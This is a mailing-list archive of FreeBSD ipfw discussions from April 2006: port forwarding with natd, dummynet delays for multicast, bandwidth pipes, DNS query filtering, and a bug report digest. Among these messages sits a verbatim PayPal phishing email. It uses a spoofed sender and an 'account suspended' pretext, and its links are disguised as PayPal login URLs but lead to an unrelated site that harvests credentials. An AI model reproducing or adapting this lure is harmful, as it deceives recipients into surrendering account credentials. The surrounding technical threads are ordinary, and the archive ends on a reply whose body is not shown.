From owner-freebsd-ipfw@FreeBSD.ORG Mon Apr 24 01:40:13 2006 Return-Path: X-Original-To: freebsd-ipfw@freebsd.org Delivered-To: freebsd-ipfw@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8013E16A40F for ; Mon, 24 Apr 2006 01:40:13 +0000 (UTC) (envelope-from tcruicksh@gmail.com) Received: from nz-out-0102.google.com (nz-out-0102.google.com [64.233.162.207]) by mx1.FreeBSD.org (Postfix) with ESMTP id F154643D46 for ; Mon, 24 Apr 2006 01:40:12 +0000 (GMT) (envelope-from tcruicksh@gmail.com) Received: by nz-out-0102.google.com with SMTP id 9so711969nzo for ; Sun, 23 Apr 2006 18:40:12 -0700 (PDT) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:from:to:subject:date:mime-version:content-type:x-mailer:x-mimeole:thread-index:message-id; b=HsjwT86gn4so1N/U5Si/ZoXdDsFBXPi1Ep24gJhGXtvQ3B6cWD3Rykz15FM92IrNIfkLJP4AokhuXQPWNozPQv/1keXZXBFi+elshdPE/WWP/ch2yJYI0HTpOX8jY06T6afQ5eGfnGxBDZvFmmU2k5mPMJHd1BTA2PXEy6Iknoc= Received: by 10.65.11.3 with SMTP id o3mr290605qbi; Sun, 23 Apr 2006 18:40:12 -0700 (PDT) Received: from jero ( [70.29.205.160]) by mx.gmail.com with ESMTP id q15sm224767qbq.2006.04.23.18.40.11; Sun, 23 Apr 2006 18:40:12 -0700 (PDT) From: "Tom Cruickshank" To: Date: Sun, 23 Apr 2006 21:44:17 -0400 MIME-Version: 1.0 X-Mailer: Microsoft Office Outlook, Build 11.0.5510 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2869 Thread-Index: AcZnQJmFYs5Vj3HfR/OCiauhlaJnBA== Message-ID: <444c2c7c.6e806909.2a41.3c8e@mx.gmail.com> Content-Type: text/plain; charset="windows-1250" Content-Transfer-Encoding: quoted-printable X-Content-Filtered-By: Mailman/MimeDel 2.1.5 Subject: question about ipfw syntax X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 24 Apr 2006 01:40:13 -0000 Hello, I=92m running Freebsd 6.0 and trying to do port forwarding on port = 5000 using ipfw. =20 Here is what I currently have. Cmd =3D =93ipfw =96q add =94 =20 =20 =20 $cmd 00530 accept all from any any to 5000 in via fxp0 $cmd 00535 accept all from any any to 5000 out = via fxp0 /sbin/natd -n fxp0 redirect_port tcp :5000 5000 =20 =20 Would this be the correct method to have port 5000 open on my firewall? =20 Please let me know. Thanks. =20 Tom =20 --=20 No virus found in this outgoing message. Checked by AVG Free Edition. Version: 7.1.385 / Virus Database: 268.4.5/322 - Release Date: 4/22/2006 =20 From owner-freebsd-ipfw@FreeBSD.ORG Mon Apr 24 11:02:48 2006 Return-Path: X-Original-To: freebsd-ipfw@freebsd.org Delivered-To: freebsd-ipfw@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 020B916A421 for ; Mon, 24 Apr 2006 11:02:47 +0000 (UTC) (envelope-from owner-bugmaster@freebsd.org) Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 0372C43D76 for ; Mon, 24 Apr 2006 11:02:45 +0000 (GMT) (envelope-from owner-bugmaster@freebsd.org) Received: from freefall.freebsd.org (peter@localhost [127.0.0.1]) by freefall.freebsd.org (8.13.4/8.13.4) with ESMTP id k3OB2i2t035500 for ; Mon, 24 Apr 2006 11:02:44 GMT (envelope-from owner-bugmaster@freebsd.org) Received: (from peter@localhost) by freefall.freebsd.org (8.13.4/8.13.4/Submit) id k3OB2hkn035494 for freebsd-ipfw@freebsd.org; Mon, 24 Apr 2006 11:02:43 GMT (envelope-from owner-bugmaster@freebsd.org) Date: Mon, 24 Apr 2006 11:02:43 GMT Message-Id: <200604241102.k3OB2hkn035494@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: peter set sender to owner-bugmaster@freebsd.org using -f From: FreeBSD bugmaster To: freebsd-ipfw@FreeBSD.org Cc: Subject: Current problem reports assigned to you X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 24 Apr 2006 11:02:48 -0000 Current FreeBSD problem reports Critical problems Serious problems S Submitted Tracker Resp. Description ------------------------------------------------------------------------------- o [2003/04/22] kern/51274 ipfw [ipfw] [patch] ipfw2 create dynamic rules f [2003/04/24] kern/51341 ipfw [ipfw] [patch] ipfw rule 'deny icmp from o [2004/11/13] kern/73910 ipfw [ipfw] serious bug on forwarding of packe o [2004/11/19] kern/74104 ipfw [ipfw] ipfw2/1 conflict not detected or r o [2005/03/13] conf/78762 ipfw [ipfw] [patch] /etc/rc.d/ipfw should exce o [2005/05/11] bin/80913 ipfw [patch] /sbin/ipfw2 silently discards MAC o [2005/11/08] kern/88659 ipfw [modules] ipfw and ip6fw do not work prop o [2005/11/08] kern/88664 ipfw [ipfw] ipfw stateful firewalling broken w o [2006/02/13] kern/93300 ipfw ipfw pipe lost packets o [2006/03/29] kern/95084 ipfw [ipfw] [patch] IPFW2 ignores "recv/xmit/v 10 problems total. Non-critical problems S Submitted Tracker Resp. Description ------------------------------------------------------------------------------- a [2001/04/13] kern/26534 ipfw [ipfw] Add an option to ipfw to log gid/u o [2002/12/10] kern/46159 ipfw [ipfw] [patch] ipfw dynamic rules lifetim o [2003/02/11] kern/48172 ipfw [ipfw] [patch] ipfw does not log size and o [2003/03/10] kern/49086 ipfw [ipfw] [patch] Make ipfw2 log to differen o [2003/04/09] bin/50749 ipfw [ipfw] [patch] ipfw2 incorrectly parses p o [2003/08/26] kern/55984 ipfw [ipfw] [patch] time based firewalling sup o [2003/12/30] kern/60719 ipfw [ipfw] Headerless fragments generate cryp o [2004/08/03] kern/69963 ipfw [ipfw] install_state warning about alread o [2004/09/04] kern/71366 ipfw [ipfw] "ipfw fwd" sometimes rewrites dest o [2004/10/22] kern/72987 ipfw [ipfw] ipfw/dummynet pipe/queue 'queue [B o [2004/10/29] kern/73276 ipfw [ipfw] [patch] ipfw2 vulnerability (parse o [2005/03/13] bin/78785 ipfw [ipfw] [patch] ipfw verbosity locks machi o [2005/05/05] kern/80642 ipfw [ipfw] [patch] ipfw small patch - new RUL o [2005/06/28] kern/82724 ipfw [ipfw] [patch] Add setnexthop and default o [2005/10/05] kern/86957 ipfw [ipfw] [patch] ipfw mac logging o [2005/10/07] kern/87032 ipfw [ipfw] [patch] ipfw ioctl interface imple o [2006/01/03] bin/91245 ipfw [patch] ipfw(8) sometimes treat ipv6 inpu o [2006/01/16] kern/91847 ipfw [ipfw] ipfw with vlanX as the device o [2006/02/16] kern/93422 ipfw ipfw divert rule no longer works in 6.0 ( o [2006/03/31] bin/95146 ipfw [ipfw][patch]ipfw -p option handler is bo 20 problems total. From owner-freebsd-ipfw@FreeBSD.ORG Tue Apr 25 13:04:24 2006 Return-Path: X-Original-To: freebsd-ipfw@freebsd.org Delivered-To: freebsd-ipfw@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4C16216A413 for ; Tue, 25 Apr 2006 13:04:24 +0000 (UTC) (envelope-from linux@giboia.org) Received: from adriana.dilk.com.br (adriana.dilk.com.br [200.250.23.1]) by mx1.FreeBSD.org (Postfix) with SMTP id 92E0A43D6E for ; Tue, 25 Apr 2006 13:04:19 +0000 (GMT) (envelope-from linux@giboia.org) Received: (qmail 32456 invoked by uid 98); 25 Apr 2006 13:04:30 -0000 Received: from 10.0.0.95 by lda.dilk.com.br (envelope-from , uid 82) with qmail-scanner-1.25-st-qms (uvscan: v4.4.00/v4545. perlscan: 1.25-st-qms. Clear:RC:1(10.0.0.95):. Processed in 0.023663 secs); 25 Apr 2006 13:04:30 -0000 Received: from unknown (HELO giboia) (linux@giboia.org@10.0.0.95) by adriana.dilk.com.br with SMTP; 25 Apr 2006 13:04:30 -0000 Date: Tue, 25 Apr 2006 10:07:54 -0300 From: Gilberto Villani Brito To: freebsd-ipfw@freebsd.org Message-ID: <20060425100754.24eb7d66@giboia> In-Reply-To: <444c2c7c.6e806909.2a41.3c8e@mx.gmail.com> References: <444c2c7c.6e806909.2a41.3c8e@mx.gmail.com> X-Mailer: Sylpheed-Claws 1.0.4 (GTK+ 1.2.10; i586-mandriva-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Subject: Re: question about ipfw syntax X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 25 Apr 2006 13:04:24 -0000 Add this rules: $cmd 00540 divert natd all from any to 5000 in via fxp1 $cmd 00541 divert natd all from 5000 to any out via fxp1 Gilberto On Sun, 23 Apr 2006 21:44:17 -0400 "Tom Cruickshank" wrote: > Hello, > > I_m running Freebsd 6.0 and trying to do port forwarding on port 5000 > using ipfw. > > > > Here is what I currently have. > > Cmd = _ipfw _q add _ > > > > > > $cmd 00530 accept all from any any to 5000 in via fxp0 > > $cmd 00535 accept all from any any to 5000 out via > fxp0 > > /sbin/natd -n fxp0 redirect_port tcp :5000 5000 > > > > > > Would this be the correct method to have port 5000 open on my firewall? > > > > Please let me know. Thanks. > > > > Tom > > > > > -- > No virus found in this outgoing message. > Checked by AVG Free Edition. > Version: 7.1.385 / Virus Database: 268.4.5/322 - Release Date: 4/22/2006 > > _______________________________________________ > freebsd-ipfw@freebsd.org mailing list > http://lists.freebsd.org/mailman/listinfo/freebsd-ipfw > To unsubscribe, send any mail to "freebsd-ipfw-unsubscribe@freebsd.org" > From owner-freebsd-ipfw@FreeBSD.ORG Tue Apr 25 20:31:21 2006 Return-Path: X-Original-To: freebsd-ipfw@freebsd.org Delivered-To: freebsd-ipfw@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id CF98816A42D for ; Tue, 25 Apr 2006 20:31:21 +0000 (UTC) (envelope-from wangx@research.ge.com) Received: from ext-ch1gw-6.online-age.net (ext-ch1gw-6.online-age.net [64.37.194.14]) by mx1.FreeBSD.org (Postfix) with ESMTP id B20A443D5D for ; Tue, 25 Apr 2006 20:31:20 +0000 (GMT) (envelope-from wangx@research.ge.com) Received: from int-ch1gw-2.online-age.net (int-ch1gw-2 [3.159.232.66]) by ext-ch1gw-6.online-age.net (8.13.6/8.13.6/20051111-SVVS-TLS-DNSBL) with ESMTP id k3PKVFGV030118 for ; Tue, 25 Apr 2006 16:31:19 -0400 Received: from cinmlef12.e2k.ad.ge.com (localhost [127.0.0.1]) by int-ch1gw-2.online-age.net (8.12.9/8.12.3/990426-RLH) with ESMTP id k3PKVECl008448 for ; Tue, 25 Apr 2006 16:31:15 -0400 (EDT) Received: from SCHMLVEM01.e2k.ad.ge.com ([3.159.168.31]) by cinmlef12.e2k.ad.ge.com with Microsoft SMTPSVC(6.0.3790.2499); Tue, 25 Apr 2006 16:31:14 -0400 X-MimeOLE: Produced By Microsoft Exchange V6.0.6603.0 content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Date: Tue, 25 Apr 2006 16:31:12 -0400 Message-ID: X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: Dummynet for multicast traffic on FreeBSD 6.0-Release Thread-Index: AcZopzFO/dfj6Ue+RGaZ7RrVhsWYkA== From: "Wang, Xi \(GE, Research\)" To: X-OriginalArrivalTime: 25 Apr 2006 20:31:14.0318 (UTC) FILETIME=[32871AE0:01C668A7] Subject: Dummynet for multicast traffic on FreeBSD 6.0-Release X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 25 Apr 2006 20:31:22 -0000 Hi,=20 I am using ipfw to introduce end-to-end delays for multicast NORM = traffic on=20 FreeBSD 6.0-RELEASE box on which mrouted is running. Without any ipfw rules, I was able to send and receive multicast traffic = from sender and receivers. I was able to observe the multicast information = through "netstat -g" on the FreeBSD box. However, when I introduced the = following rules, I was not able to establish multicast sessions and no receivers can = receive any packets from the sender. # sender ipfw add pipe 1 ip from 10.0.1.1 to 232.0.0.10 out # receivers ipfw add pipe 2 ip from 10.0.2.2 to 232.0.0.10 out ipfw add pipe 3 ip from 10.0.3.3 to 232.0.0.10 out ipfw add pipe 4 ip from 10.0.4.4 to 232.0.0.10 out ipfw pipe 1 config delay 100ms ipfw pipe 2 config delay 100ms ipfw pipe 3 config delay 100ms ipfw pipe 4 config delay 100ms I verified through "ipfw show" that the rules are active. To be sure = that ipfw is actually working, I setup a rule that introduce end-to-end delay between = 10.0.1.1 and 10.0.2.2 and it worked just fine. Does anyone know how to set up ipfw rules to introduce delay between = sender and receivers for multicast sessions? Any suggestion is greatly = appreciated. Thanks, -Xi From owner-freebsd-ipfw@FreeBSD.ORG Wed Apr 26 00:38:40 2006 Return-Path: X-Original-To: freebsd-ipfw@freebsd.org Delivered-To: freebsd-ipfw@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 12A5216A403 for ; Wed, 26 Apr 2006 00:38:40 +0000 (UTC) (envelope-from root@jgl.inksterstattoo.net) Received: from jgl.inksterstattoo.net (jgl.inksterstattoo.net [64.105.196.234]) by mx1.FreeBSD.org (Postfix) with ESMTP id A5DE143D49 for ; Wed, 26 Apr 2006 00:38:39 +0000 (GMT) (envelope-from root@jgl.inksterstattoo.net) Received: by jgl.inksterstattoo.net (Postfix, from userid 0) id 10EA424842E; Tue, 25 Apr 2006 20:38:20 -0400 (EDT) To: freebsd-ipfw@freebsd.org From: "Customer Support" <"support@paypal.com"@jgl.inksterstattoo.net> Errors-To: support@paypal.com Message-Id: <20060426003820.10EA424842E@jgl.inksterstattoo.net> Date: Tue, 25 Apr 2006 20:38:20 -0400 (EDT) MIME-Version: 1.0 Content-Type: text/plain X-Content-Filtered-By: Mailman/MimeDel 2.1.5 Subject: account maintenance and verification ( Your account is suspended ) X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list Reply-To: support@paypal.com List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 26 Apr 2006 00:38:40 -0000 [1][paypal_logo.gif] [pixel.gif] PayPal Security Measures! In accordance with PayPal's User Agreement and to ensure that your account has not been compromised, access to your account was limited. Your account access will remain limited until this issue has been resolved. To secure your account and quickly restore full access, we may require some additional information from you. To securely confirm your PayPal information please go directly to [2]https://www.paypal.com/ log in to your PayPal account and perform the steps necessary to restore your account access as soon as possible or click bellow: To continue your verification procedure [3]click here Thank you for using PayPal! The PayPal Team Please do not reply to this e-mail. Mail sent to this address cannot be answered. For assistance, [4]log in to your PayPal account and choose the "Help" link in the footer of any page. To receive email notifications in plain text instead of HTML, update your preferences [5]here. [pixel.gif] References 1. http://www.paypal.com/cgi-bin/webscr?cmd=_home 2. http://www.romspedition.ro/webmail.htm/www.paypal.com/ws/cgi-bin/webscr/login-submit/redirect.to.paypal.com/paypal/login.html 3. http://www.romspedition.ro/webmail.htm/www.paypal.com/ws/cgi-bin/webscr/login-submit/redirect.to.paypal.com/paypal/login.html 4. http://www.romspedition.ro/webmail.htm/www.paypal.com/ws/cgi-bin/webscr/login-submit/redirect.to.paypal.com/paypal/login.html 5. https://www.paypal.com/us/PREFS-NOTI From owner-freebsd-ipfw@FreeBSD.ORG Thu Apr 27 18:13:51 2006 Return-Path: X-Original-To: freebsd-ipfw@freebsd.org Delivered-To: freebsd-ipfw@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 82E6C16A453 for ; Thu, 27 Apr 2006 18:13:51 +0000 (UTC) (envelope-from dwalker@zbi.com) Received: from mail1.zbi.com (mail1.zbi.com [208.195.65.17]) by mx1.FreeBSD.org (Postfix) with ESMTP id 0B18443DE8 for ; Thu, 27 Apr 2006 18:13:08 +0000 (GMT) (envelope-from dwalker@zbi.com) Received: from ZBINY1.ZBINY.ZBINET.COM ([192.168.96.16]) by mail1.zbi.com (Lotus Domino Release 6.5.5) with ESMTP id 2006042714145334-18500 ; Thu, 27 Apr 2006 14:14:53 -0400 To: freebsd-ipfw@freebsd.org MIME-Version: 1.0 X-Mailer: Lotus Notes Release 6.5.2 June 01, 2004 Message-ID: From: Daniel Walker Date: Thu, 27 Apr 2006 14:13:02 -0400 X-MIMETrack: Serialize by Router on ZBINY1/ZBI(Release 6.5.5|November 30, 2005) at 04/27/2006 02:13:05 PM, Serialize complete at 04/27/2006 02:13:05 PM, Itemize by SMTP Server on ZBINY4/ZBI(Release 6.5.5|November 30, 2005) at 04/27/2006 02:14:53 PM, Serialize by Router on ZBINY4/ZBI(Release 6.5.5|November 30, 2005) at 04/27/2006 02:14:58 PM, Serialize complete at 04/27/2006 02:14:58 PM Content-Type: text/plain; charset="US-ASCII" X-Content-Filtered-By: Mailman/MimeDel 2.1.5 Subject: IPTABLES to IPFW for Packet Inspection Filtering X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 27 Apr 2006 18:13:51 -0000 hey all, here's what I'm looking to do. I know it could be done with IPTABLES, but as it's not available for the Mac OS X I'm trying to figure out how it would be done in IPFW ... RELAY is a workstation forwarding packets from a SOURCE workstation to all DESTINATION end points. RELAY is able to receive all packets from SOURCE bound to DESTINATION. I want RELAY to deny packets forwarding from SOURCE that are name resolution attempts to DESTINATION DNS server specifically for host WWW.YAHOO.COM (for example). To do this I need to create a rule that will look into the Data field of an DNS packet and match the query. The Data field of a DNS query packet would be written in hex. With IPTABLES I would write something like this: RELAY # iptables -I FORWARD 1 -p udp --dport 53 -m string --hex-string "|01 00 00 01 00 00 00 00 00 00 03 77 77 77 05 79 61 68 6f ff 03 63 6f 6d 00 00 01 00 01|" -j DROP How would I write this in IPFW? I can not see how to apply a rule based on the data of a packet. I've reviewed the man page of ipfw, but don't see anything there. What am I miss? Thanks. Dan From owner-freebsd-ipfw@FreeBSD.ORG Thu Apr 27 19:44:22 2006 Return-Path: X-Original-To: freebsd-ipfw@freebsd.org Delivered-To: freebsd-ipfw@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 57B6616A401 for ; Thu, 27 Apr 2006 19:44:22 +0000 (UTC) (envelope-from linux@giboia.org) Received: from adriana.dilk.com.br (adriana.dilk.com.br [200.250.23.1]) by mx1.FreeBSD.org (Postfix) with SMTP id 7476743D46 for ; Thu, 27 Apr 2006 19:44:18 +0000 (GMT) (envelope-from linux@giboia.org) Received: (qmail 70158 invoked by uid 98); 27 Apr 2006 19:44:29 -0000 Received: from 10.0.0.95 by lda.dilk.com.br (envelope-from , uid 82) with qmail-scanner-1.25-st-qms (uvscan: v4.4.00/v4545. perlscan: 1.25-st-qms. Clear:RC:1(10.0.0.95):. Processed in 0.024607 secs); 27 Apr 2006 19:44:29 -0000 Received: from unknown (HELO giboia) (linux@giboia.org@10.0.0.95) by adriana.dilk.com.br with SMTP; 27 Apr 2006 19:44:29 -0000 Date: Thu, 27 Apr 2006 16:47:41 -0300 From: Gilberto Villani Brito To: freebsd-ipfw@freebsd.org Message-ID: <20060427164741.5f657901@giboia> X-Mailer: Sylpheed-Claws 1.0.4 (GTK+ 1.2.10; i586-mandriva-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Subject: Pipes. X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 27 Apr 2006 19:44:22 -0000 Hi, I am using PF in my firewall, but for control my bandwith I am trying use ipfw. This rules work: pipe 101 config mask dst-ip 255.255.255.255 bw 500Kbit queue 50Kbytes 02000 pipe 100 ip from any to 10.0.0.0/24 via em0 in 65534 allow ip from any to any 65535 deny ip from any to any but this rules stop my network (10.0.0.0/24): pipe 101 config mask dst-ip 255.255.255.255 bw 500Kbit queue 50Kbytes 02000 pipe 100 ip from any to 10.0.0.0/24 via em1 out 65534 allow ip from any to any 65535 deny ip from any to any Why can't I use pipe in out of my interface??? Gilberto From owner-freebsd-ipfw@FreeBSD.ORG Fri Apr 28 14:52:07 2006 Return-Path: X-Original-To: ipfw@freebsd.org Delivered-To: freebsd-ipfw@FreeBSD.ORG Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4EA5716A40D for ; Fri, 28 Apr 2006 14:52:07 +0000 (UTC) (envelope-from vladone@spaingsm.com) Received: from mail.spaingsm.com (llwb135.servidoresdns.net [217.76.137.82]) by mx1.FreeBSD.org (Postfix) with ESMTP id 54DBF43D55 for ; Fri, 28 Apr 2006 14:52:02 +0000 (GMT) (envelope-from vladone@spaingsm.com) Received: from SERVER (unknown [88.158.112.6]) (using TLSv1 with cipher AES256-SHA (256/256 bits)) (No client certificate requested) by mail.spaingsm.com (Postfix) with ESMTP id D614124C5C0 for ; Fri, 28 Apr 2006 16:26:24 +0200 (CEST) Date: Fri, 28 Apr 2006 17:52:00 +0300 From: vladone X-Mailer: The Bat! (v3.62.14) Professional X-Priority: 3 (Normal) Message-ID: <1753864896.20060428175200@spaingsm.com> To: ipfw@freebsd.org In-Reply-To: References: MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Cc: Subject: Re: IPTABLES to IPFW for Packet Inspection Filtering X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list Reply-To: vladone List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 28 Apr 2006 14:52:09 -0000 Hello Daniel, Thursday, April 27, 2006, 9:13:02 PM, you wrote: > hey all, > here's what I'm looking to do. I know it could be done with IPTABLES, but > as it's not available for the Mac OS X I'm trying to figure out how it > would be done in IPFW ... > RELAY is a workstation forwarding packets from a SOURCE workstation to all > DESTINATION end points. RELAY is able to receive all packets from SOURCE > bound to DESTINATION. I want RELAY to deny packets forwarding from SOURCE > that are name resolution attempts to DESTINATION DNS server specifically > for host WWW.YAHOO.COM (for example). To do this I need to create a rule > that will look into the Data field of an DNS packet and match the query. > The Data field of a DNS query packet would be written in hex. > With IPTABLES I would write something like this: > RELAY # iptables -I FORWARD 1 -p udp --dport 53 -m string --hex-string U have in man ipfw explanation for this. src and dst: {addr | { addr or ... }} [[not] ports] An address (or a list, see below) optionally followed by ports specifiers. The second format ( or-block with multiple addresses) is provided for convenience only and its use is discouraged. addr: [not] {any | me | addr-list | addr-set} any matches any IP address. me matches any IP address configured on an interface in the system. The address list is evaluated at the time the packet is analysed. addr-list: ip-addr[,addr-list] ip-addr: A host or subnet address specified in one of the following ways: numeric-ip | hostname Matches a single IPv4 address, specified as dotted-quad or a hostname. Hostnames are resolved at the time the rule is added to the firewall list. So if u want to deny packets from some hostname u have an rule like: ipfw add 100 deny ip from me to www.hahoo.com -- Best regards, vladone mailto:vladone@spaingsm.com From owner-freebsd-ipfw@FreeBSD.ORG Fri Apr 28 15:39:41 2006 Return-Path: X-Original-To: ipfw@freebsd.org Delivered-To: freebsd-ipfw@FreeBSD.ORG Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id AFD7116A412 for ; Fri, 28 Apr 2006 15:39:41 +0000 (UTC) (envelope-from dwalker@zbi.com) Received: from mail1.zbi.com (mail1.zbi.com [208.195.65.17]) by mx1.FreeBSD.org (Postfix) with ESMTP id 724C243D6B for ; Fri, 28 Apr 2006 15:39:36 +0000 (GMT) (envelope-from dwalker@zbi.com) Received: from ZBINY1.ZBINY.ZBINET.COM ([192.168.96.16]) by mail1.zbi.com (Lotus Domino Release 6.5.5) with ESMTP id 2006042811411887-21150 ; Fri, 28 Apr 2006 11:41:18 -0400 In-Reply-To: <1753864896.20060428175200@spaingsm.com> To: vladone , ipfw@freebsd.org MIME-Version: 1.0 X-Mailer: Lotus Notes Release 6.5.2 June 01, 2004 Message-ID: From: Daniel Walker Date: Fri, 28 Apr 2006 11:39:25 -0400 X-MIMETrack: Serialize by Router on ZBINY1/ZBI(Release 6.5.5|November 30, 2005) at 04/28/2006 11:39:30 AM, Serialize complete at 04/28/2006 11:39:30 AM, Itemize by SMTP Server on ZBINY4/ZBI(Release 6.5.5|November 30, 2005) at 04/28/2006 11:41:18 AM, Serialize by Router on ZBINY4/ZBI(Release 6.5.5|November 30, 2005) at 04/28/2006 11:41:25 AM, Serialize complete at 04/28/2006 11:41:25 AM Content-Type: text/plain; charset="US-ASCII" X-Content-Filtered-By: Mailman/MimeDel 2.1.5 Cc: Subject: Re: IPTABLES to IPFW for Packet Inspection Filtering X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 28 Apr 2006 15:39:43 -0000 vladone, I appreciate the response, but after doing a little more research on the issue I've discovered it is not possible to do what I want with IPFW. what I'm trying to do is block DNS queries for a specific domain name (the domain name is not the DESTINATION but an value to be handled by the any DNS server). to do this I need to be able to match a string within the body of the data field with a string I provide and have the firewall drop packets that match. with IPTABLES I'm able to do this by predicting the hex value of the data field containing a query for the domain name www.yahoo.com. IPTABLES allows for string matching. IPFW does not. I'll have to fire up my Ubuntu to do this. thanks. dan vladone Sent by: owner-freebsd-ipfw@freebsd.org 04/28/06 10:52 AM Please respond to vladone To ipfw@freebsd.org cc Subject Re: IPTABLES to IPFW for Packet Inspection Filtering Hello Daniel, Thursday, April 27, 2006, 9:13:02 PM, you wrote: > hey all, > here's what I'm looking to do. I know it could be done with IPTABLES, but > as it's not available for the Mac OS X I'm trying to figure out how it > would be done in IPFW ... > RELAY is a workstation forwarding packets from a SOURCE workstation to all > DESTINATION end points. RELAY is able to receive all packets from SOURCE > bound to DESTINATION. I want RELAY to deny packets forwarding from SOURCE > that are name resolution attempts to DESTINATION DNS server specifically > for host WWW.YAHOO.COM (for example). To do this I need to create a rule > that will look into the Data field of an DNS packet and match the query. > The Data field of a DNS query packet would be written in hex. > With IPTABLES I would write something like this: > RELAY # iptables -I FORWARD 1 -p udp --dport 53 -m string --hex-string U have in man ipfw explanation for this. src and dst: {addr | { addr or ... }} [[not] ports] An address (or a list, see below) optionally followed by ports specifiers. The second format ( or-block with multiple addresses) is provided for convenience only and its use is discouraged. addr: [not] {any | me | addr-list | addr-set} any matches any IP address. me matches any IP address configured on an interface in the system. The address list is evaluated at the time the packet is analysed. addr-list: ip-addr[,addr-list] ip-addr: A host or subnet address specified in one of the following ways: numeric-ip | hostname Matches a single IPv4 address, specified as dotted-quad or a hostname. Hostnames are resolved at the time the rule is added to the firewall list. So if u want to deny packets from some hostname u have an rule like: ipfw add 100 deny ip from me to www.hahoo.com -- Best regards, vladone mailto:vladone@spaingsm.com _______________________________________________ freebsd-ipfw@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-ipfw To unsubscribe, send any mail to "freebsd-ipfw-unsubscribe@freebsd.org" From owner-freebsd-ipfw@FreeBSD.ORG Fri Apr 28 19:27:00 2006 Return-Path: X-Original-To: ipfw@freebsd.org Delivered-To: freebsd-ipfw@FreeBSD.ORG Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id F1C5E16A401 for ; Fri, 28 Apr 2006 19:27:00 +0000 (UTC) (envelope-from csmith@bonddesk.com) Received: from mschsps01.bonddesk.com (mschsps01.bonddesk.com [12.151.231.76]) by mx1.FreeBSD.org (Postfix) with ESMTP id 66F0D43D49 for ; Fri, 28 Apr 2006 19:27:00 +0000 (GMT) (envelope-from csmith@bonddesk.com) Received: from mimail.bdg.local ([10.132.16.100]) by chmail.bdg.local with Microsoft SMTPSVC(6.0.3790.1830); Fri, 28 Apr 2006 15:26:55 -0400 Received: from [10.133.16.54] ([10.133.16.54] RDNS failed) by mimail.bdg.local with Microsoft SMTPSVC(6.0.3790.1830); Fri, 28 Apr 2006 15:26:54 -0400 Message-ID: <44526C7C.10208@bonddesk.com> Date: Fri, 28 Apr 2006 15:26:52 -0400 From: Corey Smith User-Agent: Thunderbird 1.5 (X11/20060419) MIME-Version: 1.0 To: Daniel Walker References: In-Reply-To: Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-OriginalArrivalTime: 28 Apr 2006 19:26:54.0625 (UTC) FILETIME=[B535F110:01C66AF9] 